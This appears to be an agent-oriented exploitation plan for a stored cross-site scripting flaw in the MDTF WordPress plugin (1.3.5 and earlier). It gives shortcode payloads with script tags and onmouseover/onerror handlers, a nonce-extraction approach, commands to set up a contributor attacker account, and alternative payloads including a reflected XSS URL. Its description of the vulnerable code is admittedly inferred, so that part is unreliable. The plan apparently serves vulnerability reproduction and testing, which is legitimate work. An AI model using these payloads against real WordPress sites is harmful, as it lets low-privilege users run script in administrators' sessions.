MDTF – Meta Data and Taxonomies Filter <= 1.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the MDTF – Meta Data and Taxonomies Filter plugin (versions <= 1.3.5).

As source files are not provided, this plan is based on the patch diff analysis and known patterns in MDTF's handling of shortcode attributes and filter configurations.

---

1. Vulnerability Summary

The MDTF plugin features several shortcodes and custom post types (e.g., meta_data_filter) used to render search forms and result filters. The vulnerability arises because the plugin accepts user-defined attributes in its shortcodes (such as panel_id, class, or shortcode_id) and reflects them into the HTML output without proper sanitization via esc_attr() or esc_html().

Since Contributors can create posts and use shortcodes, they can inject malicious scripts into the post_content. When any user (including an Administrator) views the post, the script executes in their browser context.

2. Attack Vector Analysis

• Authentication: Authenticated (Contributor+)
• Vulnerable Endpoint: WordPress Post Editor (saving a post/page) / Frontend rendering.
• Vulnerable Parameter: Shortcode attributes within post_content.
• Primary Shortcode: [mdf_search_form] (most likely candidate based on common usage).
• Vulnerable Attributes (Inferred): panel_id, shortcode_id, or class.

3. Code Flow (Inferred)

1. Entry Point: A Contributor creates or edits a post containing a malicious shortcode: [mdf_search_form panel_id='"><script>alert(document.domain)</script>'].
2. Storage: WordPress saves the raw shortcode string into the wp_posts table in the post_content column.
3. Processing: When the post is requested, the do_shortcode() function triggers the plugin's registered callback for mdf_search_form.
4. Execution (Vulnerable Sink): The plugin extracts the attributes. In version 1.3.5, the callback likely looks like this:

   // Inferred logic in shortcode handler
   public function mdf_search_form_shortcode($atts) {
       extract(shortcode_atts(array(
           'shortcode_id' => 0,
           'panel_id' => '',
           'class' => ''
       ), $atts));
       
       // VULNERABLE SINK: Direct reflection into HTML
       return '<div id="' . $panel_id . '" class="' . $class . '">...</div>';
   }
   

5. Output: The browser receives the unescaped attribute, breaking out of the id or class attribute and executing the script.

4. Nonce Acquisition Strategy

While the shortcode injection itself does not require a nonce (as it's standard post content), the plugin may utilize AJAX for filter rendering. To obtain a nonce for associated AJAX actions:

1. Create a post with the MDTF shortcode as a Contributor.
2. Identify the Script Handle: Look for wp_localize_script calls in the plugin source. MDTF commonly uses a global JS variable like mdf_settings or mdf_ajax_vars.
3. Extraction:
   • Navigate to the created page using browser_navigate.
   • Execute: browser_eval("window.mdf_settings?.nonce") or browser_eval("window.mdf_ajax_vars?.ajax_nonce").
4. Note: For simple Stored XSS via shortcode attributes, a nonce is usually not required as the exploit triggers during standard page rendering.

5. Exploitation Strategy

The goal is to demonstrate that a Contributor can execute JavaScript in an Administrator's session.

Step 1: Create the Malicious Post
Use the http_request tool to simulate a Contributor saving a post with a payloaded shortcode.

• URL: http://localhost:8080/wp-admin/post-new.php (followed by the POST to post.php)
• Method: POST
• Payload Parameters:
  • post_title: XSS Test Page
  • content: [mdf_search_form panel_id='xss" onmouseover="alert(document.domain)" style="width:1000px;height:1000px;display:block;background:red;"']
  • status: publish
• Alternative Payload (Breakout): [mdf_search_form panel_id='"><script>alert(1)</script>']

Step 2: Trigger the XSS

• Log in as an Administrator.
• Navigate to the URL of the post created in Step 1.
• Observe the execution of the alert box.

6. Test Data Setup

1. User Creation:
   • wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Plugin Activation:
   • wp plugin activate wp-meta-data-filter-and-taxonomy-filter
3. Plugin Setup:
   • MDTF requires at least one "Filter" to be created to use the shortcode effectively.
   • wp post create --post_type=meta_data_filter --post_title="Test Filter" --post_status=publish
   • Note the ID of this filter (e.g., 123).

7. Expected Results

• The HTTP response for the page containing the shortcode will contain the raw payload: <div id=""><script>alert(1)</script>" ...>.
• The onmouseover event or <script> tag will execute when the page is rendered in a browser.
• The Administrator's cookies or session information could be accessed if the payload was modified for exfiltration.

8. Verification Steps

After performing the exploit via HTTP:

1. Check Post Content:
   wp post get [POST_ID] --field=post_content
   Verify the shortcode with the payload is present in the database.
2. Check Frontend Output:
   Use http_request to GET the post URL and grep for the unescaped script tag:
   grep "<script>alert(1)</script>" response_body.html

9. Alternative Approaches

If panel_id is sanitized, try these other common MDTF shortcode attributes:

1. [mdf_search_form shortcode_id='"><img src=x onerror=alert(1)>']
2. [mdf_search_form class='"><img src=x onerror=alert(1)>']
3. MDTF Search Query: If the plugin reflects the search query in a "Results for: ..." message, try:
   http://localhost:8080/?mdf_s_title=<script>alert(1)</script> (Reflected XSS check).
4. Custom Post Type Meta: If Contributors can edit meta_data_filter posts (check capabilities), inject the payload into the filter's title or description fields.